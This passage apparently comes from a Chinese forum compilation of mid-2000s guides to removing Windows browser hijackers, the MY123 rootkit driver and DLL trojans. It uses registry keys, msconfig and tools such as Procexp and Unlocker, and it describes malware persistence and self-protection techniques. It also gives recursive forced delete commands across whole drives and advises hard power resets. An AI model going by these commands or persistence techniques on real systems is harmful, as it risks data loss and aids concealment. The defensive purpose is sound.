3.在"进程"选项卡里面找到"iexplore.exe",点击它,再点击"结束进程",就会把所有的IE窗口全部关掉并且不会再弹出新的IE窗口

这样做虽然会丢失部分没有查看过的网页,但与强行关机对系统的伤害相比简直微不足道,解决这一问题的时候最重要的是不能手忙脚乱,要耐心而稳,因为大量弹出IE窗口会大量占用系统资源,而且CPU占用率会提高到100%,打开任务管理器可能会很慢,等的时间会稍微长,但绝对可以解决,除非已经死机。

几类需手工解除的恶意代码详解

1.开机弹出网页

症状:开机就会弹出网页,通常都会弹出很多窗口,让你点个措手不及

解决步骤:开始-运行-(输入)msconfig-启动-把里面有网址类的,后缀为url、html、htm的都勾掉

2.每次启动后注册表就会被更改

解决步骤:开始-运行-(输入)msconfig-启动,把运行的文件名不一定的,不过参数里面有个regedit-s,加文件名的项勾掉即可(记得先解决这个后再修复注册表)

3.每隔一段时间就弹出IE窗口

症状:这是个比较特殊的例子,这个恶意代码利用hta的特性,隐藏掉窗体,然后一段时间就弹出网页,超烦人。

解决步骤:开始-运行-(输入)msconfig-启动-把后缀为hta的都勾掉。

有些会在开机时自动打开IE

A.请看看你的“启动”菜单里是不是多了一些陌生的文件(***.hta),把它删除就没事了。

B.如果没有(***.hta)文件的,请打开注册表“开始 -> 运行 -> regedit”进入注册表,来到

“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”

看到有网址的直接删除就是了。

C.点“开始”菜单 再点 “运行” 运行msconfig.exe 点启动标签后去掉没用的启动项后重启就好1D。上面3个方法都不行的: 请先打开你的文件夹选项,将"显示所有文件"打开,再用WIN**的搜索功能查找有关自动打开的"网址" 将找到的文件(一般为HTM网页文件)删除、并记下文件名(F);再到注册表里搜索刚才查到的"文件名(F)",将找到的字段删除就可以了。

修改右键菜单(右键菜单里多了一些网站连接的)

如果右键中有网站连接。请打开注册表(C:\Windows\Regedit.exe),查找有关该连接名的键值,将找到的(一般只有1个)删除就OK了。

IE主页被恶意网站修改的解决方法

这个也是很多网友经常出现的现象,在疑难经常有人提出来!

偶也留意了一下,不管之前有多少人发过了,在这里偶还是再帖一遍吧!

注册表被修改的原因及解决办法

其实,该恶意网页是含有有害代码的ActiveX网页文件,这些广告信息的出现是因为浏览者的注册表被恶意更改的结果。

1、IE默认连接首页被修改

IE浏览器上方的标题栏被改成“欢迎访问******网站”的样式,这是最常见的篡改手段,受害者众多。

受到更改的注册表项目为:

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Internet Explorer Main Start Page

HKEY_CURRENT_USER Software Microsoft Internet Explorer Main Start Page

通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的,如浏览“*****”就会将你的IE默认连接首页修改为http://ppw.****.com ”,即便是出于给自己的主页做广告的目的,也显得太霸道了一些,这也是这类网页惹人厌恶的原因。

解决办法:

A. 注册表法:

①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;

②展开注册表到

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Internet Explorer Main下,在右半部分窗口中找到串值“Start Page”双击 ,将Start Page的键值改为“about :blank”即可;

③同理,展开注册表到HKEY_CURRENT_USER Software Microsoft Internet Explorer Main

在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。

④退出注册表编辑器,重新启动计算机,一切OK了!

特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址啦,十分的难缠。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。

解决办法:

运行注册表编辑器regedit.exe,然后依次展开

HKEY_LOCAL_MACHINE Software Microsoft Windows Current Version Run主键,然后将其下的registry.exe子键删除,然后删除自运行程序c: Program Files registry.exe,最后从IE选项中重新设置起始页就好了。

2、篡改IE的默认页

有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改啦。具体说来就是以下注册表项被修改:

HKEY_LOCAL_MACHINE Software Microsoft Internet Explorer

Main Default_Page_URL“Default_Page_URL”这个子键的键值即起始页的默认页。

解决办法:

A.运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那

些篡改网站的网址改掉就好了,或者设置为IE的默认值。

B.msconfig 有的还是将程序写入硬盘中,重启计算机后 首页设置又被改了回去,这时可使用“系统配置实用程序”来解决。开始-运行,键入msconfig点击“确定”,在弹出的窗口中切换到“启动”选项卡,禁用可疑程序启动项。

3、修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改回来。

主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):

[HKEY_CURRENT_USER Software Policies Microsoft Internet Explorer Control Pan

el]"Settings"=dword:1

[HKEY_CURRENT_USER Software Policies Microsoft Internet Explorer Control Pan

el]"Links"=dword:1

[HKEY_CURRENT_USER Software Policies Microsoft Internet Explorer Control Pan

el]"SecAddSites"=dword:1

解决办法:

将上面这些DWORD值改为“0”即可恢复功能。

4、IE的默认首页灰色按扭不可选

这是由于注册表HKEY_USERS .DEFAULT Software Policies Microsoft Internet E

xplorer Control Panel下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改为“

1”(即为灰色不可选状态)。

解决办法:

将“homepage”的键值改为“0”即可。

5、IE标题栏被修改

在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。

具体说来受到更改的注册表项目为:

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Internet Explorer Main Window Title

HKEY_CURRENT_USER Software Microsoft Internet Explorer Main Window Title

解决办法:

①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;

②展开注册表到

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Internet Explorer Main下,在右半部分窗口中找到串值“Window Title” ,将该串值删除即可,或将Window Title的键值改为“IE浏览器”等你喜欢的名字;

③同理,展开注册表到

HKEY_CURRENT_USER Software Microsoft Internet Explorer Main然后按②中所述方法处理。

④退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题解决了!

6、IE右键菜单被修改

受到修改的注册表项目为:

HKEY_CURRENT_USER Software Microsoft Internet Explorer MenuExt下被新建了网页的广告信息,并由此在IE右键菜单中出现!

解决办法:

打开注册标编辑器,找到

HKEY_CURRENT_USER Software Microsoft Internet Explorer MenuExt

删除相关的广告条文即可,注意不要把下载软件FlashGet和Netants也删除掉啊,这两个可是“正常”的呀,除非你不想在IE的右键菜单中见到它们。

7、IE默认搜索引擎被修改

在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改:

HKEY_LOCAL_MACHINE Software Microsoft Internet Explorer Search CustomizeSearch

HKEY_LOCAL_MACHINE Software Microsoft Internet Explorer Search SearchAssistant

解决办法:

运行注册表编辑器,依次展开上述子键,将“CustomizeSearch”和“SearchAssis

tant”的键值改为某个搜索引擎的网址即可。

8、系统启动时弹出对话框

受到更改的注册表项目为:

HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Winlogon

在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“L

egalNoticeCaption”是提示框的标题,“LegalNoticeText”是提示框的文本内容。由

于它们的存在,就使得我们每次登陆到Windwos桌面前都出现一个提示窗口,显示那些网

页的广告信息!你瞧,多讨厌啊!

解决办法:

打开注册表编辑器,找到

HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Winlogon

这一个主键,然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeTex

t”这两个字符串,删除这两个字符串就可以解决在登陆时出现提示框的现象了

巧妙设置 让天网防火墙防止网页病毒

作者:hanbin 来源:赛迪网技术社区

安装天网后,它默认是不防网页病毒的,现在跟大家公布一个方法,可以让天网挡住当前流行的一大部分网页病毒。

一、先上线并打开天网。

二、在桌面依次点鼠标右键选择:新建——快捷方式——然后输入如下内容: hh.exe "http://www.baidu.com"

三、在桌面依次点鼠标右键选择:新建——快捷方式——然后输入如下内容: mshta.exe "http://www.baidu.com"

四、然后分别点他们让他们运行。

这时候天网会立即弹出窗口询问是否允许他们访问网络,全部选择禁止!

五、好了,现在就可以关掉那窗口,删掉你刚刚建立的快捷方式了。

六、解释:

这里的hh.exe是运行windows的html帮助的程序,但是它也可以访问网络,而且比IE的执行权限要大,也就是说:在IE里不能被执行的命令,可以被它执行,可怕吧,如果恶意网站调用了它,可以小黑你的系统一下!

而mshta.exe是微软的基于Web的应用程序。但是它也可以访问网络,并且权限大的惊人,当它访问网络时,它本身就拥有和本地应用程序一样大的对系统的可操作权限,它执行网页里的任何IE不能执行或是说没权限执行的可执行代码而不给出提示。如果恶意网站调用了它的话,那么可就黑你没商量——连提示都没有,可以完全控制你的系统、你的硬盘!

深入剖析 MY123流氓软件四种清除方法

作者:db19851217 来源:赛迪网技术社区

MY123创造了很多流氓软件的第一,有望争夺流氓软件的“最流氓软件宝座”:

1、驱动保护(System Bus Extend驱动,安全模式下也加载)。

2、随机文件名,DLL和SYS。

3、多线程保护,网络自动升级。

4、极强的自动恢复。

5、驱动文件独占方式,其它任何程序也无法读写及删除。

一、MY123的前世今生

风雨送飘(飘雪piaoxue)归,飞雪(fiexue)迎春到。才别傲讯(allxun)网,又见一二三(MY123)。

短短一个多月时间,这些锁主页的流氓软件已经让上千万的网民明白了什么叫做强盗,什么叫做无耻,什么叫做疯狂。9号的时候就已经听人放言10号以后会有一个流氓会大规模爆发。果然,在2006/11/11号这个光棍节的时候,MY123如期而至。现在看来,原因在于这个流氓软件已经早就潜伏于用户的电脑中,通过和多个其它流氓软件的捆绑以及其它的渠道,已经潜入成百上千万的网民电脑中,平常也是启动的,但判断日期小于11/11号,就潜伏不动,一旦系统时间大于11号,就开始修改用户主页。而选择这个特殊时间,选择在周未的时候,显然也是别有用心,可以利用反病毒厂商假期的时候反应不及时而大规模爆发。

从规模及爆发面积来看,全国各地可能有数百万甚至上千万用户被该流氓恶意修改了主页,这和之前爆发的大面积piaoxue.com、feixue.net、73ss.com、9505.com、

81915.com、4199.com等恶意修改用户主页,十分相似。同以往的一些“老流氓”相比,这些新流氓的特征是爆发面积特别大,效果明显,目的明确单一(修改主页),手段新奇狠毒,叹为观止。

显然这是一场预谋已久的活动,并且短短几天内,这个驱动病毒至少已经有三个不同的版本,造成一些专杀工具失效。这个MY123已经具备所有病毒的特征,希望总有一天法律能将这种无良的作者绳之以法。

二、剖析流氓手段

这个驱动经过层层改进,家庭发扬得很光大,看看:

1、飘雪(piaoxue)

2、飞雪(feixue)

3、QQHelper

4、allxun.com傲讯

5、My123(7255)

最早的MY123只有一个驱动,已经有多个专杀工具可以杀。后来又出现版本2,即多一个同名的.dll位于system32目录下,现在的版本3,是一个非同名的.dll位于system32目录下。今天主要分析一下我手头拿到的这个版本3。

1、程序安装

首先是释放一个.dll到system32目录下,文件名的特征是随机的8位字母(也有版本是6位字母加2位数字),然后调用rundll32.exe wceiukte,DllUnregisterServer来注册COM组件,接下来调用Rundll32.exe wceiukte.dll,DllCanUnloadNow来运行程序,并且注册WH_CALLWNDPROC这个系统挂钩。

DLL分别注入SYSTEM和EXPLORER进程空间,进行保护,如果检测没有驱动,则会自动释放出驱动,然后加载。同时这个DLL具有网络下载升级功能。

这个dll运行后,会生成一个.sys文件,放到drivers系统目录下。DLL通过一个算法得到SYS文件名,算法是:DLL的文件名ascii码+32143289052890852-32143289052890848-34320958+34320955就是SYS文件名也就是ascii + 1即.dll的文件名为:wceiukte.dll那么.sys文件名就为:xdfjvluf.sys

2、注册和加载驱动

会在注册表的HKLM\SYSTEM\CurrentControlSet\Services\下写下同驱动名的一个值,把自己注册为System Bus Extend的驱动,使得它的优先级很高,即使在安全模式下加载,也使得很多想清除它的软件无效。然后通过services来加载驱动,驱动加载后,生成三个线程附加到system这个系统核心进程上,(以前的驱动是两个线程)获取最高权限。通过Process Explorer可以查看到这三个线程:

三个线程的作用分别为:

0x1dd4,自身文件独占及句柄检测保护模块等,会将自身文件以独占方式打开,这样若不解除独占,任何Windows下使用常规访问文件方法的程序包括杀毒软件都无法读写或者删除它的驱动程序文件。

文件句柄检测保护模块则是为了防止手工或者专杀的解除句柄的操作。以前的手工清除或者专杀都是需要先解除这个独占,才能删除文件。

但该驱动增加了这个保护,会不停检测自身文件的独占是否被强制解除,如果检测到,立即再次独占。

0x1816,服务保护模块:该模块会检测驱动自身的注册表服务项,不停地暴力重写自身服务项,使得无法删除其服务项。

0x103e,篡改首页模块:该模块会不停暴力重写注册表中首页设置为www.my123.com,导致无法对该项进行修复。

三、手工清除办法(适合目前有一定操作技能的用户)

清除了这个流氓的手段,就可以针对来找一些清除办法了。当然,比起上一次的飘雪来,困难了许多。

1、找出驱动

要杀流氓软件的第一步,就是要找出流氓软件,可以有多种办法找出这个流氓软件。

用到我以前写的一篇文章《釜底抽薪:用autoruns揪出流氓软件的驱动保护》,我们今天就来实战一下。运行autoruns之后,在它的“Options(选项)”菜单中有两项“Verifiy Code Signatures(验证代码签名)“Hide Signed Microsoft Entries(隐藏已签名的微软项)“,把这两项都选中了。扫描之后,我们只看驱动(driver)这一项:

可以看出来,它是假冒微软的驱动。这个驱动虽然写明是微软的,但是没有经过微软的数字签名,所以肯定是假的。(可能你的机器上显示特别多,但所有非微软的,都是有问题的),因为是随机生成的文件名,所以你那里找出来的,可能跟我的不一样。请自己记下文件名。特征是8位随机的字母,并且公司是微软公司,但是显示(Not verified),如果你这里不能确认,可以用下面的办法。

2、用Procexp找出驱动名来

运行Procexp,(下载地址见最后),找到system这个进程,然后点右键——属性(Properties)——线程(Threads),然后把下面的框子拉到最后,看有连续三个,比较无规则的八个字母的驱动,再跟autoruns对一下就可以确定是哪个驱动了。

3、删除驱动.sys

打开c:\windows\sytem32\drivers目录,由于这个.sys驱动文件把自己设为系统、隐藏,所以需要打开文件夹的显示系统文件的选项才能看到。(你也可以用这个办法来找到驱动,一般的正常驱动都不会想着隐藏自己的)。

在那个驱动文件上点右键,然后——Unlocker——会出来一个对话框,显示当前已经使用这个.sys的进程,点“Unlock“,然后再Unlocker一下显示文件已经被删除了以为大功告成了。

但是紧接着怪事就出事了,刷新一下,发觉这个文件又出现了!百思不得其解,已经确认所有的后台服务都是正常的,那个.dll也已经被删除了,这个问题困扰了许久,又拿出驱动好好研究了一下,终于发觉这个极其变态的办法——一个正常的人是不可能把写出这样的驱动的!

它注册了一个NotifyRoutine的一个回调函数,这个是一个自我修复的功能,只要系统任何进程或线程打开,它马上会调用,检查文件如果被删了就立即从内存中自动恢复!显然是针对上一次飘雪的那个手工专杀或者清除办法做的一次改进,正常办法根本不可能删掉。

用Unlocker的确是把文件删除了,但是没有办法不启动其它进程或者线程啊,即使马上选择关机,它也会新建线程,这个时候它也马上可能恢复了。

也不知怎么了,突然灵光一线,想到一个绝招,断电法!就是:删除之后,马上不做任何操作,直接按机器电源键重启!经实验是成功的。

清除之前,我们先要停止那三个system中的线程,那个会不停地自动检测,打开procexp,然后在system上点右键---属性---线程, 点一下Start Address,这样可以按字母排序,找到刚才我们看到的驱动,三个连续在一起。点一下线程,然后点那个“Suspend“按钮,将这个线程暂停。(它做了自我保护,杀不掉的,只能暂停)。

确保停止线程之后,这个按钮都变成“Resume(暂停)”,三个线程全部暂停之后,打开c:\windows\system32\drivers目录,右键点那个.sys驱动---unlocker。

第一次先unlock那个System的句柄占用。第二次再unlocker,这个时候就会出来一个对话框,这时注意了:

一手将鼠标移动OK对话框中,一手找到机器的RESET键(请确保这个键有效,直接断电对机器有损伤),在按下鼠标之后,一看到那个删除OK的提示之后,马上按下RESET键,直接重启机器(如果是笔记本,就先把电池拿了,直接断电)。这个办法讲究眼急手快,如果无效再试一次。

按我的经验,两秒之后按下RESET键都是有效的(杀这个东西真不容易,再次诅咒一个写出这么变态驱动的人来)。

4、删除.dll

当失去驱动保护之后,这个DLL也就肉鸡了,要杀要剐全凭你喜欢了。你放在那里不管也无所谓。它隐藏得也很深,没有在注册表的启动组里面表现出来。360出的专杀,只能杀MY123的前两代,对于这个第三代,目前为止还不能清除,只能清除.dll。所以有时开机之后会显示加载DLL失败:

这个是由那个该死的驱动去加载的,所以找注册表是没有用的。

重启之后,再重新设一下IE的主页,应该就可以了。至于那个Seriver的值,删不删都无所谓了。

四、DOS大法

DOS大法一直是我们杀这类驱动流氓的最后一招,无论多么强的驱动保护,只要用了它,手到擒来,但是由于要安装另外一个系统或者操作DOS,对于新手来说,有一定难度,所以一般来说,都不是我推荐的。这里建议去下载一个叫vfloopy的虚拟软驱软件,安装之后,系统重启的时候就多了一项,启动到虚拟软驱,这样可以直去直接删除这个驱动文件。

上面这个累了一身汗的办法,不知多久就地失效,但思路是一样的,只要找到驱动文件,下面就是如何删除的问题。写飘雪的时候就想着写这个办法了,但是觉得麻烦,不愿意再启一个操作系统。

你也可以用深山红叶这类系统急救光盘或者另外一个Windows去删除那个驱动文件,具体的操作流程我就不多费口舌了。

五、专杀工具

当然,上面这些操作还是比较繁琐,对于普通用户来说难度太高了。目前市面已经可以清除MY123的工具有:

360专杀工具:目前可以清除1、2、3代。

Windows清理助手:目前可以清除1、2、3代,效果不错。

一剑封喉 用系统的权限法清理dll木马

新手也能对付病毒如何清除插入式木马

目前网络上最猖獗的病毒估计非木马程序莫数了,2005年木马程序的攻击性也有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等,这些木马也是目前最难对付的。本期就教你查找和清除线程插入式木马。

一、通过自动运行机制查木马

一说到查找木马,许多人马上就会想到通过木马的启动项来寻找“蛛丝马迹”,具体的地方一般有以下几处:

1)注册表启动项

在“开始/运行”中输入“regedit.exe”打开注册表编辑器,依次展开[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\]和[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\],查看下面所有以Run开头的项,其下是否有新增的和可疑的键值,也可以通过键值所指向的文件路径来判断,是新安装的软件还是木马程序。另外[HKEY_LOCAL_MACHINE\Software\classes\exefile\shell\open\command\]键值也可能用来加载木马,比如把键值修改为“X:\windows\system\ABC.exe %1%”。

2)系统服务

有些木马是通过添加服务项来实现自启动的,大家可以打开注册表编辑器,在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]下查找可疑键值,并在[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\]下查看的可疑主键。然后禁用或删除木马添加的服务项:在“运行”中输入“Services.msc”打开服务设置窗口,里面显示了系统中所有的服务项及其状态、启动类型和登录性质等信息。找到木马所启动的服务,双击打开它,把启动类型改为“已禁用”,确定后退出。也可以通过注册表进行修改,依次展开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\服务显示名称”键,在右边窗格中找到二进制值“Start”,修改它的数值数,“2”表示自动,“3”表示手动,而“4”表示已禁用。当然最好直接删除整个主键,平时可以通过注册表导出功能,备份这些键值以便随时对照。

3)开始菜单启动组

现在的木马大多不再通过启动菜单进行随机启动,但是也不可掉以轻心。如果发现在“开始/程序/启动”中有新增的项,可以右击它选择“查找目标”到文件的目录下查看一下,如果文件路径为系统目录就要多加小心了。也可以在注册表中直接查看,它的位置为[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders],键名为Startup。

4)系统INI文件Win.ini和System.ini

系统INI文件Win.ini和System.ini里也是木马喜欢隐蔽的场所。选择“开始/运行”,输入“msconfig”调出系统配置实用程序,检查Win.ini的[Windows]小节下的load和run字段后面有没有什么可疑程序,一般情况下“=”后面是空白的;还有在System.ini的[boot]小节中的Shell=Explorer.exe后面也要进行检查。

5)批处理文件

如果你使用的是Win9X系统,C盘根目录下“AUTOEXEC.BAT”和WINDOWS目录下的“WinStart.bat”两个批处理文件也要看一下,里面的命令一般由安装的软件自动生成,在系统默认会将它们自动加载。在批处理文件语句前加上“echo off”,启动时就只显示命令的执行结果,而不显示命令的本身;如果再在前面加一个“@”字符就不会出现任何提示,以前的很多木马都通过此方法运行。

二、通过文件对比查木马

最近新出现的一种木马。它的主程序成功加载后,会将自身做为线程插入到系统进程SPOOLSV.EXE中,然后删除系统目录中的病毒文件和病毒在注册表中的启动项,以使反病毒软件和用户难以查觉,然后它会监视用户是否在进行关机和重启等操作,如果有,它就在系统关闭之前重新创建病毒文件和注册表启动项。下面的几招可以让它现出原形(下面均以Win XP系统为例):

1)对照备份的常用进程

大家平时可以先备份一份进程列表,以便随时进行对比查找可疑进程。方法如下:开机后在进行其他操作之前即开始备份,这样可以防止其他程序加载进程。在运行中输入“cmd”,然后输入“tasklist /svc >X:\processlist.txt”(提示:不包括引号,参数前要留空格,后面为文件保存路径)回车。这个命令可以显示应用程序和本地或远程系统上运行的相关任务/进程的列表。输入“tasklist /?”可以显示该命令的其它参数。

2)对照备份的系统DLL文件列表

对于没有独立进程的DLL木马怎么办吗?既然木马打的是DLL文件的主意,我们可以从这些文件下手,一般系统DLL文件都保存在system32文件夹下,我们可以对该目录下的DLL文件名等信息作一个列表,打开命令行窗口,利用CD命令进入system32目录,然后输入“dir *.dll>X:\listdll.txt”敲回车,这样所有的DLL文件名都被记录到listdll.txt文件中。日后如果怀疑有木马侵入,可以再利用上面的方法备份一份文件列表“listdll2.txt”,然后利用“UltraEdit”等文本编辑工具进行对比;或者在命令行窗口进入文件保存目录,输入“fc listdll.txt listdll2.txt”,这样就可以轻松发现那些发生更改和新增的DLL文件,进而判断是否为木马文件。

3)对照已加载模块

频繁安装软件会使system32目录中的文件发生较大变化,这时可以利用对照已加载模块的方法来缩小查找范围。在“开始/运行”中输入“msinfo32.exe”打开 “系统信息”,展开“软件环境/加载的模块”,然后选择“文件/导出”把它备份成文本文件,需要时再备份一个进行对比即可。

4)查看可疑端口

所有的木马只要进行连接,接收/发送数据则必然会打开端口,DLL木马也不例外,这里我们使用netstat命令查看开启的端口。我们在命令行窗口中输入“netstat -an”显示出显示所有的连接和侦听端口。Proto是指连接使用的协议名称,Local Address是本地计算机的IP地址和连接正在使用的端口号,Foreign Address是连接该端口的远程计算机的IP地址和端口号,State则是表明TCP连接的状态。Windows XP所带的netstat命令比以前的版本多了一个-O参数,使用这个参数就可以把端口与进程对应起来。输入“netstat /?”可以显示该命令的其它参数。接着我们可以通过分析所打开的端口,将范围缩小到具体的进程上,然后使用进程分析软件,例如“Windows优化大师”目录下的WinProcess.exe程序,来查找嵌入其中的木马程序。有些木马会通过端口劫持或者端口重用的方法来进行通信的,一般它们会选择139、80等常用端口,所以大家分析时要多加注意。也可以利用网络嗅探软件(如:Commview)来了解打开的端口到底在传输些什么数据。

驱除毒源双击无法打开驱动器的杀毒方法

作者:db19851217 来源:赛迪网技术社区

昨天将U盘插到电脑后双击无法打开,紧接着双击所有驱动器盘符都没有办法打开,试验以后发现只有使用资源管理器可以。但终究不爽,鬼知道病毒在电脑里还干了些什么,决定彻底杀掉。

症状描述

1.双击驱动器盘符无法打开,资源管理器可以使用。

2.在开始→运行里输入cmd进入命令行模式,输入 C:回车 ,进入C盘根目录,输入 dir /a 查看所有文件,发现存在如下两个文件: Autorun.inf RavMon.exe。

3.在开始→运行里输入msconfig,进入系统配置程序,选择“启动”标签,里面有一个叫做 “MDM”的项指向“C:\windows\mdm.exe”。

解决方法

1.重新启动,开机时按F8,进入带命令行的安全模式,选择Administrator账号登陆。

2.在命令行下输入regedit进入注册表,查找"RavMon.exe",如果发现匹配项就删除(我 没有发现,这样做是保险起见)。注意RsRavMon是瑞星杀毒软件,不用删除。

3.在命令行下输入msconfig,进入系统配置程序,选择“启动”标签,将所有“MDM”项前面 的勾去掉保存。

4.在命令行下输入以下指令

del C:\Autorun.inf /f /s /q /a del

C:\RavMon.exe /f /s /q /a del

D:\Autorun.inf /f /s /q /a del

D:\RavMon.exe /f /s /q /a ……

有多少盘符输多少个。注意这个指令会删除根目录往下所有目录的对应文件,所以大家看 到删除了根目录下的以后马上按Ctrl+C中断。

5.重新启动,OK啦。

6.要彻底清楚,主要还是要把U盘里的毒源杀掉。我没有试别的办法,直接偷懒进Linux下 用rm删了个干净。如果大家认识的人有装Linux的可以请他帮忙,个人认为这样做是最安全的。在Windows/Dos平台下怎么做还请高手出招。

说明

1.MDM是微软的Machine Debug Manager,系统进程;病毒伪装成了mdm.exe。

2.本杀毒方法思想可用于清除类似病毒


一剑封喉 用系统的权限法清理dll木马

作者:db19851217 来源:赛迪网技术社区

相信大家对Dll木马都是非常熟悉了。它确实是个非常招人恨的家伙。它不像普通的exe木马那样便于识别和清理,这个家伙的隐蔽性非常强,它可以嵌入到一些如rundll32.exe,svchost.exe等正常的进程中去,让你找不到,即使找到了也难以清除,因为正常的进程正在调用它嘛。

我用的是Mcafee的杀毒软件,比如说它现在报告

defds.dll:C:\ Documents and Settings\Administrator\Local Settings\ Temp\ defds.dll删除失败

fdgeg.com:C:\Windows\ime\fdgeg.com删除失败

那么可以知道defds.dll应该是个dll木马 我们可以通过冰刃IceSword来查看系统的进程,找到调用该dll文件的进程 比如说是notepad.exe 我们可以先尝试着终止该进程 该进程如果终止后过不了多久又重新运行(而我并没有运行记事本)那么我们可以判定fdgeg.com就是notepad.exe的的守护进程 当它发现它所监视的notepad.exe进程被终止后会立刻将notepad.exe重新启用

现在我们可以:我的电脑-----工具----文件夹选项-----查看在高级设置的选项下去掉”简单文件共享”的钩子(我的电脑是XP操作系统,NTFS磁盘格式)然后到C:\Windo0ws\ime下找到fdgeg.com 右键选择属性 在属性中选择”安全” 单击”高级” 在弹出的窗口中使”从父项继承那些可以应用到子对象的权限项目,包括那些在此明确定义的项目”不被选中,再在弹出的窗口中单击”删除”,再依次单击”确定”。这样就没有任何用户可以使fdgeg.com工作了。通过IceSword终止notepad.exe 然后到

C:\ Documents and Settings\Administrator\Local Settings

中删除defds.dll 然后到C:\Windows\ime中再找到Tempfdgeg.com右键属性在属性中选择”安全” 单击”高级” 在弹出的窗口中选中”从父项继承那些可以应用到子对象的权限项目,包括那些在此明确定义的项目” 然后删除它即可

最后别忘了在注册表的启动项中将这个dll木马删除这样 我们就彻底将这个讨厌的dll木马从我们的电脑中清除了。

高手详解 木马和病毒清除的通用解法

作者:hanbin 来源:赛迪网技术社区

“木马”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装自己。 当然它也会悄无声息地启动,你当然不会指望用户每次启动后点击“木马”图标来运行服务端,,“木马”会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。下面具体谈谈“木马”是怎样自动加载的。

在win.ini文件中,在[WINDOWS]下面,“run=”和“load=”是可能加载“木马”程序的途径,必须仔细留心它们。一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。当然你也得看清楚,因为好多“木马”,如“AOL Trojan木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件。

在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”,那么后面跟着的那个程序就是“木马”程序,就是说你已经中“木马”了。

在注册表中的情况最复杂,通过regedit命令打开注册表编辑器,在点击至:“HKEY-LOCAL-MACHINE”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE,这里切记:有的“木马”程序生成的文件很像系统自身文件,想通过伪装蒙混过关,如“Acid Battery v1.0木马”,它将注册表“HKEY-LOCAL-MACHINE”下的 Explorer 键值改为Explorer=“C:.exe”,“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序,如:“HKEY-CURRENT-USER”、“HKEY-USERS\u65290***”的目录下都有可能,最好的办法就是在“HKEY-LOCAL-MACHINE”下找到“木马”程序的文件名,再在整个注册表中搜索即可。

知道了“木马”的工作原理,查杀“木马”就变得很容易,如果发现有“木马”存在,最安全也是最有效的方法就是马上将计算机与网络断开,防止黑客通过网络对你进行攻击。然后编辑win.ini文件,将[WINDOWS]下面,“run=“木马”程序”或“load=“木马”程序”更改为“run=”和“load=”;编辑system.ini文件,将[BOOT]下面的“shell=‘木马’文件”,更改为:“shell=explorer.exe”;在注册表中,用regedit对注册表进行编辑,先在“HKEY-LOCAL-MACHINE”下找到“木马”程序的文件名,再在整个注册表中搜索并替换掉“木马”程序,有时候还需注意的是:有的“木马”程序并不是直接将HKEY-LOCAL-MACHINE”下的“木马”键值删除就行了,因为有的“木马”如:BladeRunner“木马”,如果你删除它,“木马”会立即自动加上,你需要的是记下“木马”的名字与目录,然后退回到MS-DOS下,找到此“木马”文件并删除掉。重新启动计算机,然后再到注册表中将所有“木马”文件的键值删除。至此,我们就大功告成了。

安全小妙招 WinRAR硬盘杀毒绝技

笔者的电脑最近在使用时出现一个怪现象,双击D盘无法直接打开(其他盘符均正常),总是弹出窗口提示“找不到pagefile.pif,指定位置”, 因此每次只有通过右键的“打开”菜单来打开,而仔细查看右键菜单发现里面多了一个“自动播放”的项目。

